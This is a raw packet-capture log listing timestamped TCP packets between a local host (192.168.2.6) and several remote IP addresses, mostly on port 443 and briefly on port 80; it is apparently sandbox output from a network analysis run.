Nov 23, 2024 07:09:24.183417082 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.192748070 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.192775011 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.192831039 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.192837954 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.192888975 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.192888975 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.200530052 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.200551033 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.200622082 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.200628042 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.200687885 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.200687885 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.205482006 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.205733061 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.205789089 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.206881046 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.206944942 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.207355976 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.207454920 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.207601070 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.207618952 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.209259987 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.209280014 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.209331989 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.209337950 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.209366083 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.209388018 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.211471081 CET	49743	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.218210936 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.218231916 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.218293905 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.218301058 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.218352079 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.218353033 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.224431038 CET	443	49746	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.224895000 CET	49746	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.224931955 CET	443	49746	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.227948904 CET	443	49746	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.228003979 CET	49746	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.228611946 CET	49746	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.228683949 CET	443	49746	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.228883028 CET	49746	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.228889942 CET	443	49746	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.258671999 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.262551069 CET	49743	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.262653112 CET	443	49743	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.262736082 CET	49743	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.263940096 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.264034986 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.264081001 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.264139891 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.266465902 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.266535044 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.266550064 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.266604900 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.269462109 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.269540071 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.269555092 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.269601107 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.270910978 CET	49746	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.273360968 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.273437977 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.273451090 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.273509026 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.276474953 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.276560068 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.276575089 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.276628971 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.280389071 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.280469894 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.280483961 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.280538082 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.283442974 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.283524036 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.283539057 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.283641100 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.286524057 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.286596060 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.286611080 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.286659002 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.290445089 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.290512085 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.290525913 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.290580988 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.293447971 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.293514967 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.293529034 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.293577909 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.296926975 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.297015905 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.297029972 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.297086954 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.299886942 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.299911976 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.299956083 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.299969912 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.299993992 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.300031900 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.300075054 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.300134897 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.300163984 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.300215006 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.303966045 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.304044008 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.304058075 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.304124117 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.307060003 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.307135105 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.307151079 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.307203054 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.307356119 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.307377100 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.307434082 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.307442904 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.307456017 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.307499886 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.310086966 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.310163021 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.310188055 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.310240984 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.311048985 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.311074972 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.311115980 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.311126947 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.311161995 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.311240911 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.313813925 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.313839912 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.313883066 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.313889027 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.313951969 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.313961029 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.314026117 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.314039946 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.314089060 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.319097996 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.319165945 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.319171906 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.319207907 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.319216967 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.319252014 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.319428921 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.319443941 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.319508076 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.319514036 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.319578886 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.320831060 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.320846081 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.327673912 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.327692032 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.327805996 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.327812910 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.327850103 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.336026907 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.336046934 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.336107969 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.336113930 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.336138010 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.336159945 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.343772888 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.343791962 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.343863964 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.343873024 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.343930960 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.351001024 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.351021051 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.351074934 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.351083040 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.351193905 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.358329058 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.358397007 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.358411074 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.358418941 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.358444929 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.358479023 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.358489990 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.358535051 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.358619928 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.358666897 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.362086058 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.362099886 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.367865086 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.367898941 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.367935896 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.367949963 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.367988110 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.367988110 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.376274109 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.376307011 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.376364946 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.376370907 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.376404047 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.376492977 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.384670019 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.384706974 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.384740114 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.384746075 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.384799004 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.384799004 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.393150091 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.393172026 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.393224001 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.393229008 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.393265963 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.393281937 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.401041985 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.401070118 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.401129961 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.401134968 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.401179075 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.401179075 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.403430939 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:24.403503895 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:24.408955097 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.408976078 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.409053087 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.409059048 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.409091949 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.409091949 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.417290926 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.417310953 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.417383909 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.417390108 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.417413950 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.417429924 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.425259113 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.425280094 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.425365925 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.425373077 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.425399065 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.425422907 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.474508047 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.474595070 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.474641085 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.474879980 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.477193117 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.477267981 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.477289915 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.477340937 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.480967045 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.481070042 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.481110096 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.481158972 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.483906984 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.483983040 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.484004021 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.484061956 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.487168074 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.487230062 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.487246990 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.487303019 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.490943909 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.491009951 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.491027117 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.491086006 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.494441032 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.494507074 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.494529963 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.494585037 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.496968985 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.497059107 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.497075081 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.497147083 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.501005888 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.501097918 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.501115084 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.501174927 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.504049063 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.504127026 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.504143000 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.504196882 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.507451057 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.507519007 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.507543087 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.507594109 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.510548115 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.510623932 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.510653973 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.510709047 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.514482975 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.514568090 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.514591932 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.514646053 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.518373966 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.518438101 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.518449068 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.518487930 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.520607948 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.520668030 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.520678997 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.520723104 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.524445057 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.524503946 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.524517059 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.524553061 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.578713894 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.578744888 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.578787088 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.578799009 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.578849077 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.578849077 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.586863041 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.586944103 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.586957932 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.586978912 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.587014914 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.587044001 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.587061882 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.587089062 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.591780901 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.591799021 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.684853077 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.684942961 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.684989929 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.685044050 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.687944889 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.688015938 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.688043118 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.688090086 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.691608906 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.691679955 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.691693068 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.691739082 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.694297075 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.694370031 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.694376945 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.694441080 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.698004961 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.698077917 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.698092937 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.698136091 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.700032949 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.700095892 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.700110912 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.700139999 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.700140953 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.700155020 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.700170994 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.700170994 CET	49731	443	192.168.2.6	150.171.27.10
